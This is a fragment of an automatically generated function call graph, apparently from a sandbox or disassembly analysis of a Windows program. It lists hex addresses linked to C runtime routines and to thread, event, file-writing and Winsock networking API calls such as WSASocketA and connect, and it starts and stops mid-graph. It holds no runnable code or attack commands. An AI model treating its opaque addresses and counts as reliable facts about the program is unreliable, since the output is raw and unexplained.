2e32eb4 _free 59 API calls 19609->19611 19610->19607 19612 2e324d9 19610->19612 19611->19610 19613 2e3250a 19612->19613 19614 2e324e5 _strlen 19612->19614 19613->19607 19615 2e32eec _malloc 59 API calls 19614->19615 19616 2e324f7 19615->19616 19616->19613 19617 2e36bfc std::exception::_Copy_str 59 API calls 19616->19617 19617->19613 19619 2e2d74e __EH_prolog 19618->19619 19622 2e2b66f 19619->19622 19621 2e2d785 Mailbox 19621->19592 19623 2e2b679 __EH_prolog 19622->19623 19624 2e32453 std::exception::exception 59 API calls 19623->19624 19625 2e2b68a Mailbox 19624->19625 19625->19621 19637 2e2b033 19626->19637 19629 2e23fdc 19644 2e45330 19629->19644 19631 2e23fe6 CreateEventA 19632 2e2400f 19631->19632 19633 2e23ffd 19631->19633 19632->19565 19634 2e23fb0 Mailbox 68 API calls 19633->19634 19635 2e24005 19634->19635 19636 2e2a5be Mailbox 60 API calls 19635->19636 19636->19632 19638 2e240c1 19637->19638 19639 2e2b03f 19637->19639 19638->19629 19640 2e33a8f _Allocate 60 API calls 19639->19640 19641 2e2b04f std::exception::exception 19639->19641 19640->19641 19641->19638 19642 2e3449a __CxxThrowException@8 RaiseException 19641->19642 19643 2e2fa64 19642->19643 19644->19631 19646 2e3330a 19645->19646 19647 2e3331e 19645->19647 19649 2e35d9b __gmtime64_s 59 API calls 19646->19649 19648 2e389ac __calloc_crt 59 API calls 19647->19648 19650 2e3332b 19648->19650 19651 2e3330f 19649->19651 19652 2e3337c 19650->19652 19654 2e35b9a CallCatchBlock 59 API calls 19650->19654 19653 2e34e35 __gmtime64_s 9 API calls 19651->19653 19655 2e32eb4 _free 59 API calls 19652->19655 19659 2e3204b 19653->19659 19656 2e33338 19654->19656 19657 2e33382 19655->19657 19658 2e35c21 __initptd 59 API calls 19656->19658 19657->19659 19664 2e35d7a 19657->19664 19661 2e33341 CreateThread 19658->19661 19659->19544 19659->19545 19659->19546 19661->19659 19663 2e33374 GetLastError 19661->19663 19672 2e3345c 19661->19672 19663->19652 19669 2e35d67 19664->19669 19666 2e35d83 __dosmaperr 19667 2e35d9b __gmtime64_s 59 API calls 19666->19667 19668 2e35d96 19667->19668 19668->19659 19670 2e35bb2 __getptd_noexit 59 API calls 19669->19670 19671 2e35d6c 19670->19671 19671->19666 19673 2e33465 __threadstartex@4 19672->19673 19674 2e3910b __threadstartex@4 TlsGetValue 19673->19674 19675 2e3346b 19674->19675 19676 2e33472 __threadstartex@4 19675->19676 19677 2e3349e 19675->19677 19679 2e3912a __threadstartex@4 TlsSetValue 19676->19679 19678 2e35a2f __freefls@4 59 API calls 19677->19678 19683 2e334b9 ___crtIsPackagedApp 19678->19683 19680 2e33481 19679->19680 19681 2e33487 GetLastError RtlExitUserThread 19680->19681 19682 2e33494 GetCurrentThreadId 19680->19682 19681->19682 19682->19683 19687 2e334cd 19683->19687 19688 2e33404 19683->19688 19694 2e33395 19687->19694 19689 2e33446 RtlDecodePointer 19688->19689 19690 2e3340d LoadLibraryExW GetProcAddress 19688->19690 19693 2e33456 19689->19693 19691 2e33430 RtlEncodePointer 19690->19691 19692 2e3342f 19690->19692 19691->19689 19692->19687 19693->19687 19695 2e333a1 ___BuildCatchObject 19694->19695 19696 2e35b9a CallCatchBlock 59 API calls 19695->19696 19697 2e333a6 19696->19697 19704 2e320a0 19697->19704 19722 2e31550 19704->19722 19707 2e320f0 19744 2e2dce7 19707->19744 19708 2e320e8 TlsSetValue 19708->19707 19741 2e315b4 19722->19741 19723 2e31630 19724 2e31646 19723->19724 19726 2e31643 CloseHandle 19723->19726 19728 2e3448b ___strgtold12_l 6 API calls 19724->19728 19725 2e315cc 19727 2e3160e ResetEvent 19725->19727 19729 2e315e5 OpenEventA 19725->19729 19760 2e31b50 19725->19760 19726->19724 19732 2e31615 19727->19732 19730 2e3165e 19728->19730 19734 2e31607 19729->19734 19735 2e315ff 19729->19735 19730->19707 19730->19708 19731 2e316dc WaitForSingleObject 19731->19741 19764 2e31790 19732->19764 19734->19727 19734->19732 19735->19734 19738 2e31604 CloseHandle 19735->19738 19736 2e316b0 CreateEventA 19736->19741 19737 2e315e2 19737->19729 19738->19734 19740 2e31b50 GetCurrentProcessId 19740->19741 19741->19723 19741->19725 19741->19731 19741->19736 19741->19740 19743 2e316ce CloseHandle 19741->19743 19743->19741 19745 2e2dd09 19744->19745 19775 2e24d86 19745->19775 19746 2e2dd0c 19748 2e31e70 19746->19748 19749 2e31ea9 TlsGetValue 19748->19749 19758 2e31ea1 Mailbox 19748->19758 19749->19758 19774 2e30bb0 19760->19774 19762 2e31ba2 GetCurrentProcessId 19763 2e31bb5 19762->19763 19763->19737 19765 2e3179f 19764->19765 19768 2e317d5 CreateEventA 19765->19768 19769 2e31b50 GetCurrentProcessId 19765->19769 19770 2e317f7 19765->19770 19766 2e31803 SetEvent 19767 2e3162d 19766->19767 19767->19723 19768->19770 19771 2e317eb 19768->19771 19772 2e317d2 19769->19772 19770->19766 19770->19767 19771->19770 19773 2e317f0 CloseHandle 19771->19773 19772->19768 19773->19770 19774->19762 19776 2e24d90 __EH_prolog 19775->19776 19777 2e30a50 Mailbox 68 API calls 19776->19777 19778 2e24da6 RtlEnterCriticalSection RtlLeaveCriticalSection 19777->19778 19779 2e250d4 shared_ptr 19778->19779 19790 2e24dd1 std::bad_exception::bad_exception 19778->19790 19779->19746 19781 2e250a1 RtlEnterCriticalSection RtlLeaveCriticalSection 19782 2e250b3 RtlEnterCriticalSection RtlLeaveCriticalSection 19781->19782 19782->19779 19782->19790 19783 2e2a658 73 API calls 19783->19790 19785 2e24e8d RtlEnterCriticalSection RtlLeaveCriticalSection 19787 2e24e9f RtlEnterCriticalSection RtlLeaveCriticalSection 19785->19787 19786 2e2ce0c 73 API calls 19786->19790 19787->19790 19790->19781 19790->19782 19790->19783 19790->19785 19790->19786 19790->19787 19793 2e31830 2 API calls 19790->19793 19794 2e24100 2 API calls 19790->19794 19795 2e24bed 19790->19795 19819 2e27c57 19790->19819 19823 2e2cf3e 19790->19823 19829 2e27c31 19790->19829 19832 2e2a8e5 19790->19832 19844 2e2a9bd 19790->19844 19793->19790 19794->19790 19796 2e24bf7 __EH_prolog 19795->19796 19797 2e21ba7 209 API calls 19796->19797 19820 2e27c73 19819->19820 19917 2e28fe5 19820->19917 19824 2e2cf48 __EH_prolog 19823->19824 19828 2e2cf71 19824->19828 19924 2e29151 19824->19924 19938 2e2882b 19829->19938 19833 2e2a8ef __EH_prolog 19832->19833 19834 2e27c31 std::bad_exception::bad_exception 60 API calls 19833->19834 19845 2e2a9c7 __EH_prolog 19844->19845 19953 2e2cfc9 19845->19953 19939 2e28840 19938->19939 19940 2e288b4 19938->19940 19967 2e32413 19964->19967 19968 2e324d9 std::exception::_Copy_str 59 API calls 19967->19968 19969 2e2182a 19968->19969 19969->19552 19976 2e2d63d 19970->19976 19973 2e2cb90 19985 2e2d675 19973->19985 19975 2e2a5eb 19975->19558 19979 2e2b161 19976->19979 19980 2e2b16b __EH_prolog 19979->19980 19981 2e32453 std::exception::exception 59 API calls 19980->19981 19982 2e2b17c 19981->19982 19983 2e27c31 std::bad_exception::bad_exception 60 API calls 19982->19983 19984 2e2a5dd 19983->19984 19984->19973 19986 2e2d67f __EH_prolog 19985->19986 19989 2e2b559 19986->19989 19988 2e2d6b6 Mailbox 19988->19975 19990 2e2b563 __EH_prolog 19989->19990 19991 2e2b161 std::bad_exception::bad_exception 60 API calls 19990->19991 19992 2e2b574 Mailbox 19991->19992 19992->19988 20014 2e2353e 19993->20014 19997 2e22ae8 WSASetLastError connect 19996->19997 19998 2e22ad8 19996->19998 20000 2e2a43c 69 API calls 19997->20000 19999 2e30a50 Mailbox 68 API calls 19998->19999 20002 2e22add 19999->20002 20001 2e22b07 20000->20001 20001->20002 20003 2e30a50 Mailbox 68 API calls 20001->20003 20004 2e30a50 Mailbox 68 API calls 20002->20004 20003->20002 20005 2e22b1b 20004->20005 20006 2e30a50 Mailbox 68 API calls 20005->20006 20009 2e22b38 20005->20009 20006->20009 20010 2e22b87 20009->20010 20074 2e23027 20009->20074 20010->19365 20013 2e30a50 Mailbox 68 API calls 20013->20010 20015 2e23548 __EH_prolog 20014->20015 20016 2e23576 20015->20016 20017 2e23557 20015->20017 20036 2e22edd WSASetLastError WSASocketA 20016->20036 20018 2e21996 68 API calls 20017->20018 20021 2e2355f 20018->20021 20021->19366 20022 2e235ad CreateIoCompletionPort 20023 2e235c5 GetLastError 20022->20023 20024 2e235db 20022->20024 20025 2e30a50 Mailbox 68 API calls 20023->20025 20026 2e30a50 Mailbox 68 API calls 20024->20026 20027 2e235d2 20025->20027 20026->20027 20028 2e23626 20027->20028 20029 2e235ef 20027->20029 20062 2e2de26 20028->20062 20030 2e30a50 Mailbox 68 API calls 20029->20030 20031 2e23608 20030->20031 20044 2e229ee 20031->20044 20034 2e23659 20035 2e30a50 Mailbox 68 API calls 20034->20035 20035->20021 20037 2e30a50 Mailbox 68 API calls 20036->20037 20038 2e22f0a WSAGetLastError 20037->20038 20039 2e22f21 20038->20039 20040 2e22f41 20038->20040 20041 2e22f27 setsockopt 20039->20041 20042 2e22f3c 20039->20042 20040->20021 20040->20022 20041->20042 20043 2e30a50 Mailbox 68 API calls 20042->20043 20043->20040 20047 2e22a0c 20044->20047 20061 2e22aad 20044->20061 20045 2e22a39 WSASetLastError closesocket 20048 2e2a43c 69 API calls 20045->20048 20046 2e30a50 Mailbox 68 API calls 20049 2e22ab8 20046->20049 20047->20045 20050 2e30a50 Mailbox 68 API calls 20047->20050 20051 2e22a51 20048->20051 20049->20021 20052 2e22a21 20050->20052 20053 2e30a50 Mailbox 68 API calls 20051->20053 20051->20061 20066 2e22f50 20052->20066 20055 2e22a5c 20053->20055 20057 2e22a7b ioctlsocket WSASetLastError closesocket 20055->20057 20058 2e30a50 Mailbox 68 API calls 20055->20058 20060 2e2a43c 69 API calls 20057->20060 20059 2e22a6e 20058->20059 20059->20057 20059->20061 20060->20061 20061->20046 20061->20049 20063 2e2de30 __EH_prolog 20062->20063 20064 2e33a8f _Allocate 60 API calls 20063->20064 20065 2e2de44 20064->20065 20065->20034 20067 2e22f70 WSASetLastError setsockopt 20066->20067 20068 2e22f5b 20066->20068 20070 2e2a43c 69 API calls 20067->20070 20069 2e30a50 Mailbox 68 API calls 20068->20069 20072 2e22a36 20069->20072 20071 2e22f9e 20070->20071 20071->20072 20073 2e30a50 Mailbox 68 API calls 20071->20073 20072->20045 20073->20072 20075 2e2303b 20074->20075 20076 2e2304d WSASetLastError select 20074->20076 20077 2e30a50 Mailbox 68 API calls 20075->20077 20078 2e2a43c 69 API calls 20076->20078 20081 2e22b59 20077->20081 20079 2e23095 20078->20079 20080 2e30a50 Mailbox 68 API calls 20079->20080 20079->20081 20080->20081 20081->20010 20082 2e22fb4 20081->20082 20083 2e22fc0 20082->20083 20084 2e22fd5 WSASetLastError getsockopt 20082->20084 20085 2e30a50 Mailbox 68 API calls 20083->20085 20086 2e2a43c 69 API calls 20084->20086 20089 2e22b7a 20085->20089 20087 2e2300f 20086->20087 20088 2e30a50 Mailbox 68 API calls 20087->20088 20087->20089 20088->20089 20089->20010 20089->20013 20097 2e45330 20090->20097 20092 2e232b5 RtlEnterCriticalSection 20093 2e30a50 Mailbox 68 API calls 20092->20093 20094 2e232d6 20093->20094 20098 2e23307 20094->20098 20097->20092 20100 2e23311 __EH_prolog 20098->20100 20101 2e23350 20100->20101 20110 2e27db5 20100->20110 20114 2e2239d 20101->20114 20104 2e23390 20120 2e27d5e 20104->20120 20105 2e30a50 Mailbox 68 API calls 20108 2e2337c 20105->20108 20109 2e22d39 71 API calls 20108->20109 20109->20104 20113 2e27dc3 20110->20113 20111 2e27e39 20111->20100 20113->20111 20124 2e2891a 20113->20124 20116 2e223ab 20114->20116 20115 2e22417 20115->20104 20115->20105 20116->20115 20117 2e223c1 PostQueuedCompletionStatus 20116->20117 20119 2e223f8 InterlockedExchange RtlLeaveCriticalSection 20116->20119 20117->20116 20118 2e223da RtlEnterCriticalSection 20117->20118 20118->20116 20119->20116 20122 2e27d63 20120->20122 20121 2e232ee RtlLeaveCriticalSection 20121->19381 20122->20121 20140 2e21e7f 20122->20140 20125 2e28944 20124->20125 20126 2e27d5e 68 API calls 20125->20126 20127 2e2898a 20126->20127 20128 2e289b1 20127->20128 20130 2e2a1a7 20127->20130 20128->20111 20131 2e2a1b1 20130->20131 20132 2e2a1c1 20130->20132 20131->20132 20135 2e2fa65 20131->20135 20132->20128 20136 2e32413 std::exception::exception 59 API calls 20135->20136 20137 2e2fa7d 20136->20137 20138 2e3449a __CxxThrowException@8 RaiseException 20137->20138 20139 2e2fa92 20138->20139 20141 2e30a50 Mailbox 68 API calls 20140->20141 20142 2e21e90 20141->20142 20142->20122 20144 2e321bb _LocaleUpdate::_LocaleUpdate 59 API calls 20143->20144 20145 2e322d7 20144->20145 20146 2e322e5 20145->20146 20149 2e322fc 20145->20149 20147 2e35d9b __gmtime64_s 59 API calls 20146->20147 20148 2e322ea 20147->20148 20150 2e34e35 __gmtime64_s 9 API calls 20148->20150 20151 2e322f5 ___ascii_stricmp 20149->20151 20152 2e358ba 66 API calls __tolower_l 20149->20152 20150->20151 20151->19392 20152->20149 20154 2e327cb 20153->20154 20155 2e35d9b __gmtime64_s 59 API calls 20154->20155 20158 2e327db _strlen 20154->20158 20156 2e327d0 20155->20156 20157 2e34e35 __gmtime64_s 9 API calls 20156->20157 20157->20158 20158->19399 20160 2e2df3d __EH_prolog 20159->20160 20161 2e33a8f _Allocate 60 API calls 20160->20161 20162 2e2df54 20161->20162 20162->19418 20164 2e2a645 GetProcessHeap HeapFree 20163->20164 20164->19426 20166 2e321bb _LocaleUpdate::_LocaleUpdate 59 API calls 20165->20166 20167 2e36005 20166->20167 20168 2e35d9b __gmtime64_s 59 API calls 20167->20168 20169 2e3600a 20168->20169 20170 2e36adb 20169->20170 20183 2e3602a __output_l __aulldvrm _strlen 20169->20183 20210 2e39d71 20169->20210 20171 2e35d9b __gmtime64_s 59 API calls 20170->20171 20172 2e36ae0 20171->20172 20174 2e34e35 __gmtime64_s 9 API calls 20172->20174 20175 2e36ab5 20174->20175 20176 2e3448b ___strgtold12_l 6 API calls 20175->20176 20177 2e323b6 20176->20177 20177->19436 20189 2e35e41 20177->20189 20179 2e36b10 79 API calls _write_multi_char 20179->20183 20180 2e36693 RtlDecodePointer 20180->20183 20181 2e32eb4 _free 59 API calls 20181->20183 20182 2e389f4 __malloc_crt 59 API calls 20182->20183 20183->20170 20183->20175 20183->20179 20183->20180 20183->20181 20183->20182 20184 2e366f6 RtlDecodePointer 20183->20184 20185 2e36b84 79 API calls _write_string 20183->20185 20186 2e3671b RtlDecodePointer 20183->20186 20187 2e3fa24 61 API calls __cftof 20183->20187 20188 2e36b58 79 API calls _write_multi_char 20183->20188 20217 2e3dc4e 20183->20217 20184->20183 20185->20183 20186->20183 20187->20183 20188->20183 20190 2e39d71 __flush 59 API calls 20189->20190 20191 2e35e4f 20190->20191 20192 2e35e71 20191->20192 20193 2e35e5a 20191->20193 20195 2e35e76 20192->20195 20202 2e35e83 __flsbuf 20192->20202 20194 2e35d9b __gmtime64_s 59 API calls 20193->20194 20197 2e35e5f 20194->20197 20196 2e35d9b __gmtime64_s 59 API calls 20195->20196 20196->20197 20197->19436 20198 2e35f61 20200 2e39d95 __write 79 API calls 20198->20200 20199 2e35ee7 20201 2e35f01 20199->20201 20203 2e35f18 20199->20203 20200->20197 20232 2e39d95 20201->20232 20202->20197 20206 2e35ed2 20202->20206 20209 2e35edd 20202->20209 20220 2e3f6e2 20202->20220 20203->20197 20260 2e3f736 20203->20260 20206->20209 20229 2e3f8a5 20206->20229 20209->20198 20209->20199 20211 2e39d90 20210->20211 20212 2e39d7b 20210->20212 20211->20183 20213 2e35d9b __gmtime64_s 59 API calls 20212->20213 20214 2e39d80 20213->20214 20215 2e34e35 __gmtime64_s 9 API calls 20214->20215 20216 2e39d8b 20215->20216 20216->20183 20218 2e321bb _LocaleUpdate::_LocaleUpdate 59 API calls 20217->20218 20219 2e3dc5f 20218->20219 20219->20183 20221 2e3f6fa 20220->20221 20222 2e3f6ed 20220->20222 20224 2e3f706 20221->20224 20225 2e35d9b __gmtime64_s 59 API calls 20221->20225 20223 2e35d9b __gmtime64_s 59 API calls 20222->20223 20226 2e3f6f2 20223->20226 20224->20206 20227 2e3f727 20225->20227 20226->20206 20228 2e34e35 __gmtime64_s 9 API calls 20227->20228 20228->20226 20230 2e389f4 __malloc_crt 59 API calls 20229->20230 20231 2e3f8ba 20230->20231 20231->20209 20233 2e39da1 ___BuildCatchObject 20232->20233 20234 2e39dc5 20233->20234 20235 2e39dae 20233->20235 20237 2e39e64 20234->20237 20240 2e39dd9 20234->20240 20236 2e35d67 __dosmaperr 59 API calls 20235->20236 20239 2e39db3 20236->20239 20238 2e35d67 __dosmaperr 59 API calls 20237->20238 20243 2e39dfc 20238->20243 20244 2e35d9b __gmtime64_s 59 API calls 20239->20244 20241 2e39e01 20240->20241 20242 2e39df7 20240->20242 20285 2e40bc7 20241->20285 20245 2e35d67 __dosmaperr 59 API calls 20242->20245 20249 2e35d9b __gmtime64_s 59 API calls 20243->20249 20247 2e39dba ___BuildCatchObject 20244->20247 20245->20243 20247->20197 20248 2e39e07 20250 2e39e1a 20248->20250 20251 2e39e2d 20248->20251 20252 2e39e70 20249->20252 20294 2e39e84 20250->20294 20255 2e35d9b __gmtime64_s 59 API calls 20251->20255 20254 2e34e35 __gmtime64_s 9 API calls 20252->20254 20254->20247 20256 2e39e32 20255->20256 20257 2e35d67 __dosmaperr 59 API calls 20256->20257 20258 2e39e26 20257->20258 20353 2e39e5c 20258->20353 20261 2e3f742 ___BuildCatchObject 20260->20261 20262 2e3f753 20261->20262 20263 2e3f76b 20261->20263 20264 2e35d67 __dosmaperr 59 API calls 20262->20264 20265 2e3f810 20263->20265 20269 2e3f7a0 20263->20269 20266 2e3f758 20264->20266 20267 2e35d67 __dosmaperr 59 API calls 20265->20267 20268 2e35d9b __gmtime64_s 59 API calls 20266->20268 20270 2e3f815 20267->20270 20271 2e3f760 ___BuildCatchObject 20268->20271 20272 2e40bc7 ___lock_fhandle 60 API calls 20269->20272 20273 2e35d9b __gmtime64_s 59 API calls 20270->20273 20271->20197 20274 2e3f7a6 20272->20274 20275 2e3f81d 20273->20275 20276 2e3f7d4 20274->20276 20277 2e3f7bc 20274->20277 20278 2e34e35 __gmtime64_s 9 API calls 20275->20278 20279 2e35d9b __gmtime64_s 59 API calls 20276->20279 20280 2e3f832 __lseeki64_nolock 61 API calls 20277->20280 20278->20271 20282 2e3f7d9 20279->20282 20281 2e3f7cb 20280->20281 20386 2e3f808 20281->20386 20283 2e35d67 __dosmaperr 59 API calls 20282->20283 20283->20281 20286 2e40bd3 ___BuildCatchObject 20285->20286 20287 2e40c22 RtlEnterCriticalSection 20286->20287 20288 2e3882d __lock 59 API calls 20286->20288 20289 2e40c48 ___BuildCatchObject 20287->20289 20290 2e40bf8 20288->20290 20289->20248 20291 2e40c10 20290->20291 20292 2e3914c __mtinitlocks InitializeCriticalSectionAndSpinCount 20290->20292 20356 2e40c4c 20291->20356 20292->20291 20295 2e39e91 __write_nolock 20294->20295 20296 2e39ed0 20295->20296 20297 2e39eef 20295->20297 20326 2e39ec5 20295->20326 20298 2e35d67 __dosmaperr 59 API calls 20296->20298 20302 2e39f47 20297->20302 20303 2e39f2b 20297->20303 20301 2e39ed5 20298->20301 20299 2e3448b ___strgtold12_l 6 API calls 20300 2e3a6e5 20299->20300 20300->20258 20304 2e35d9b __gmtime64_s 59 API calls 20301->20304 20305 2e39f60 20302->20305 20360 2e3f832 20302->20360 20306 2e35d67 __dosmaperr 59 API calls 20303->20306 20307 2e39edc 20304->20307 20309 2e3f6e2 __write_nolock 59 API calls 20305->20309 20310 2e39f30 20306->20310 20311 2e34e35 __gmtime64_s 9 API calls 20307->20311 20312 2e39f6e 20309->20312 20313 2e35d9b __gmtime64_s 59 API calls 20310->20313 20311->20326 20314 2e3a2c7 20312->20314 20319 2e35b9a CallCatchBlock 59 API calls 20312->20319 20315 2e39f37 20313->20315 20317 2e3a2e5 20314->20317 20318 2e3a65a WriteFile 20314->20318 20316 2e34e35 __gmtime64_s 9 API calls 20315->20316 20316->20326 20320 2e3a2fb 20317->20320 20321 2e3a409 20317->20321 20322 2e3a2ba GetLastError 20318->20322 20325 2e3a287 20318->20325 20323 2e39f9a GetConsoleMode 20319->20323 20324 2e3a693 20320->20324 20320->20325 20328 2e3a36a WriteFile 20320->20328 20334 2e3a414 20321->20334 20346 2e3a4fe 20321->20346 20322->20325 20323->20314 20327 2e39fd9 20323->20327 20324->20326 20329 2e35d9b __gmtime64_s 59 API calls 20324->20329 20325->20324 20325->20326 20332 2e3a3e7 20325->20332 20326->20299 20327->20314 20330 2e39fe9 GetConsoleCP 20327->20330 20328->20320 20328->20322 20331 2e3a6c1 20329->20331 20330->20324 20351 2e3a018 20330->20351 20336 2e35d67 __dosmaperr 59 API calls 20331->20336 20337 2e3a3f2 20332->20337 20338 2e3a68a 20332->20338 20333 2e3a573 WideCharToMultiByte 20333->20322 20333->20346 20334->20324 20334->20325 20335 2e3a479 WriteFile 20334->20335 20335->20322 20335->20334 20336->20326 20340 2e35d9b __gmtime64_s 59 API calls 20337->20340 20339 2e35d7a __dosmaperr 59 API calls 20338->20339 20339->20326 20342 2e3a3f7 20340->20342 20341 2e3a5c2 WriteFile 20344 2e3a615 GetLastError 20341->20344 20341->20346 20345 2e35d67 __dosmaperr 59 API calls 20342->20345 20344->20346 20345->20326 20346->20324 20346->20325 20346->20333 20346->20341 20347 2e40f93 WriteConsoleW CreateFileW __putwch_nolock 20347->20351 20348 2e3a101 WideCharToMultiByte 20348->20325 20350 2e3a13c WriteFile 20348->20350 20349 2e3ff4a 61 API calls __write_nolock 20349->20351 20350->20322 20350->20351 20351->20322 20351->20325 20351->20347 20351->20348 20351->20349 20352 2e3a196 WriteFile 20351->20352 20369 2e3dc88 20351->20369 20352->20322 20352->20351 20385 2e40f6d RtlLeaveCriticalSection 20353->20385 20355 2e39e62 20355->20247 20359 2e38997 RtlLeaveCriticalSection 20356->20359 20358 2e40c53 20358->20287 20359->20358 20372 2e40e84 20360->20372 20362 2e3f842 20363 2e3f85b SetFilePointerEx 20362->20363 20364 2e3f84a 20362->20364 20365 2e3f873 GetLastError 20363->20365 20368 2e3f84f 20363->20368 20366 2e35d9b __gmtime64_s 59 API calls 20364->20366 20367 2e35d7a __dosmaperr 59 API calls 20365->20367 20366->20368 20367->20368 20368->20305 20370 2e3dc4e __isleadbyte_l 59 API calls 20369->20370 20371 2e3dc95 20370->20371 20371->20351 20373 2e40ea4 20372->20373 20374 2e40e8f 20372->20374 20377 2e35d67 __dosmaperr 59 API calls 20373->20377 20380 2e40ec9 20373->20380 20375 2e35d67 __dosmaperr 59 API calls 20374->20375 20376 2e40e94 20375->20376 20379 2e35d9b __gmtime64_s 59 API calls 20376->20379 20378 2e40ed3 20377->20378 20381 2e35d9b __gmtime64_s 59 API calls 20378->20381 20382 2e40e9c 20379->20382 20380->20362 20383 2e40edb 20381->20383 20382->20362 20384 2e34e35 __gmtime64_s 9 API calls 20383->20384 20384->20382 20385->20355 20389 2e40f6d RtlLeaveCriticalSection 20386->20389 20388 2e3f80e 20388->20271 20389->20388 20390->19440 20392 2e2e26d __EH_prolog 20391->20392 20393 2e33a8f _Allocate 60 API calls 20392->20393 20394 2e2e276 20393->20394 20395 2e21bfa RtlEnterCriticalSection 20394->20395 20397 2e2e484 20394->20397 20395->19445 20398 2e2e48e __EH_prolog 20397->20398 20401 2e226db RtlEnterCriticalSection 20398->20401 20400 2e2e4e4 20400->20395 20402 2e22728 CreateWaitableTimerA 20401->20402 20403 2e2277e 20401->20403 20405 2e2275b SetWaitableTimer 20402->20405 20406 2e22738 GetLastError 20402->20406 20404 2e227d5 RtlLeaveCriticalSection 20403->20404 20407 2e33a8f _Allocate 60 API calls 20403->20407 20404->20400 20405->20403 20408 2e30a50 Mailbox 68 API calls 20406->20408 20411 2e2278a 20407->20411 20409 2e22745 20408->20409 20445 2e21712 20409->20445 20410 2e227c8 20451 2e27d36 20410->20451 20411->20410 20413 2e33a8f _Allocate 60 API calls 20411->20413 20414 2e227a9 20413->20414 20417 2e21cf8 CreateEventA 20414->20417 20418 2e21d52 CreateEventA 20417->20418 20419 2e21d23 GetLastError 20417->20419 20420 2e21d6b GetLastError 20418->20420 20437 2e21d96 20418->20437 20422 2e21d33 20419->20422 20425 2e21d7b 20420->20425 20421 2e332fc __beginthreadex 201 API calls 20423 2e21db6 20421->20423 20424 2e30a50 Mailbox 68 API calls 20422->20424 20426 2e21dc6 GetLastError 20423->20426 20427 2e21e0d 20423->20427 20428 2e21d3c 20424->20428 20429 2e30a50 Mailbox 68 API calls 20425->20429 20435 2e21dd8 20426->20435 20430 2e21e11 WaitForSingleObject CloseHandle 20427->20430 20431 2e21e1d 20427->20431 20432 2e21712 60 API calls 20428->20432 20433 2e21d84 20429->20433 20430->20431 20431->20410 20436 2e21d4e 20432->20436 20434 2e21712 60 API calls 20433->20434 20434->20437 20438 2e21ddf 20435->20438 20439 2e21ddc CloseHandle 20435->20439 20436->20418 20437->20421 20440 2e21de9 CloseHandle 20438->20440 20441 2e21dee 20438->20441 20439->20438 20440->20441 20442 2e30a50 Mailbox 68 API calls 20441->20442 20443 2e21dfb 20442->20443 20444 2e21712 60 API calls 20443->20444 20444->20427 20446 2e2171c __EH_prolog 20445->20446 20447 2e2173e 20446->20447 20448 2e21815 Mailbox 59 API calls 20446->20448 20447->20405 20449 2e21732 20448->20449 20454 2e2a3d5 20449->20454 20452 2e27d43 CloseHandle 20451->20452 20453 2e27d52 20451->20453 20452->20453 20453->20404 20455 2e2a3df __EH_prolog 20454->20455 20462 2e2c93a 20455->20462 20459 2e2a400 20460 2e3449a __CxxThrowException@8 RaiseException 20459->20460 20461 2e2a40e 20460->20461 20463 2e2b161 std::bad_exception::bad_exception 60 API calls 20462->20463 20464 2e2a3f2 20463->20464 20465 2e2c976 20464->20465 20466 2e2c980 __EH_prolog 20465->20466 20469 2e2b110 20466->20469 20468 2e2c9af Mailbox 20468->20459 20470 2e2b11a __EH_prolog 20469->20470 20471 2e2b161 std::bad_exception::bad_exception 60 API calls 20470->20471 20472 2e2b12b Mailbox 20471->20472 20472->20468 20484 2e230ae WSASetLastError 20473->20484 20475 2e23c90 20478 2e216ae 20475->20478 20477 2e230ae 71 API calls 20477->20475 20479 2e216b8 __EH_prolog 20478->20479 20480 2e21701 20479->20480 20481 2e32413 std::exception::exception 59 API calls 20479->20481 20480->19299 20482 2e216dc 20481->20482 20483 2e2a3d5 60 API calls 20482->20483 20483->20480 20485 2e230ce 20484->20485 20486 2e230ec WSAStringToAddressA 20484->20486 20485->20486 20488 2e230d3 20485->20488 20487 2e2a43c 69 API calls 20486->20487 20489 2e23114 20487->20489 20490 2e30a50 Mailbox 68 API calls 20488->20490 20491 2e23154 20489->20491 20496 2e2311e _memcmp 20489->20496 20499 2e230d8 20490->20499 20492 2e23135 20491->20492 20497 2e30a50 Mailbox 68 API calls 20491->20497 20493 2e23193 20492->20493 20494 2e30a50 Mailbox 68 API calls 20492->20494 20498 2e30a50 Mailbox 68 API calls 20493->20498 20493->20499 20494->20493 20495 2e30a50 Mailbox 68 API calls 20495->20492 20496->20492 20496->20495 20497->20492 20498->20499 20499->20475 20499->20477 20501 2e23bdd __EH_prolog 20500->20501 20502 2e23bfe htonl htonl 20501->20502 20512 2e323f7 20501->20512 20502->19460 20507 2e23c20 __EH_prolog 20506->20507 20508 2e23c41 20507->20508 20509 2e323f7 std::bad_exception::bad_exception 59 API calls 20507->20509 20508->19460 20510 2e23c35 20509->20510 20511 2e2a58a 60 API calls 20510->20511 20511->20508 20513 2e32413 std::exception::exception 59 API calls 20512->20513 20514 2e23bf2 20513->20514 20515 2e2a58a 20514->20515 20516 2e2a594 __EH_prolog 20515->20516 20523 2e2caad 20516->20523 20520 2e2a5af 20521 2e3449a __CxxThrowException@8 RaiseException 20520->20521 20522 2e2a5bd 20521->20522 20530 2e323dc 20523->20530 20526 2e2cae9 20527 2e2caf3 __EH_prolog 20526->20527 20533 2e2b47f 20527->20533 20529 2e2cb22 Mailbox 20529->20520 20531 2e32453 std::exception::exception 59 API calls 20530->20531 20532 2e2a5a1 20531->20532 20532->20526 20534 2e2b489 __EH_prolog 20533->20534 20535 2e323dc std::bad_exception::bad_exception 59 API calls 20534->20535 20536 2e2b49a Mailbox 20535->20536 20536->20529 20538 2e23770 20537->20538 20539 2e23755 InterlockedCompareExchange 20537->20539 20541 2e30a50 Mailbox 68 API calls 20538->20541 20539->20538 20540 2e23765 20539->20540 20542 2e232ab 78 API calls 20540->20542 20543 2e23779 20541->20543 20542->20538 20544 2e229ee 76 API calls 20543->20544 20545 2e2378e 20544->20545 20545->19464 20575 2e335f0 20546->20575 20548 2e253c8 20548->19474 20549 2e33849 20548->20549 20550 2e33855 ___BuildCatchObject 20549->20550 20551 2e33873 20550->20551 20552 2e3388b 20550->20552 20554 2e33883 ___BuildCatchObject 20550->20554 20553 2e35d9b __gmtime64_s 59 API calls 20551->20553 20717 2e39732 20552->20717 20556 2e33878 20553->20556 20554->19476 20558 2e34e35 __gmtime64_s 9 API calls 20556->20558 20558->20554 20563 2e339d3 ___BuildCatchObject 20562->20563 20564 2e339e7 20563->20564 20565 2e339ff 20563->20565 20566 2e35d9b __gmtime64_s 59 API calls 20564->20566 20567 2e39732 __lock_file 60 API calls 20565->20567 20572 2e339f7 ___BuildCatchObject 20565->20572 20568 2e339ec 20566->20568 20569 